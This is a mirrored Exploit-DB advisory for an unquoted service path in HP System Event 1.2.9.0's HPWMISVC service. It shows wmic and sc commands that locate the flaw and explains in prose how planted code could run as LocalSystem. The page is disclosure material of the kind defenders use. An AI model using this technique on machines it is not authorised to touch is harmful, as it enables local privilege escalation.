bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/48075.txt
Offensive Security 228a37da9c DB: 2020-02-18 
15 changes to exploits/shellcodes

HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
Cuckoo Clock v5.0 - Buffer Overflow

Anviz CrossChex - Buffer Overflow (Metasploit)
SOPlanning 1.45 - 'by' SQL Injection
Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting
Avaya Aura Communication Manager 5.2 - Remote Code Execution
Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
SOPlanning 1.45 - 'users' SQL Injection
LabVantage 8.3 - Information Disclosure
2020-02-18 05:01:54 +00:00

35 lines
No EOL
1.8 KiB
Text
Raw Blame History

# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-02-14
# Vendor Homepage:https://www8.hp.com/mx/es/home.html
# Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe
# HP Development Company, L.P.
# Tested Version: 1.2.9.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """
HPWMISVC HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe Auto
C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HPWMISVC
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HPWMISVC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be
# executed during application startup or reboot. If successful, the local user's code would
# execute with the elevated privileges of the application.
Reference in a new issue View git blame Copy permalink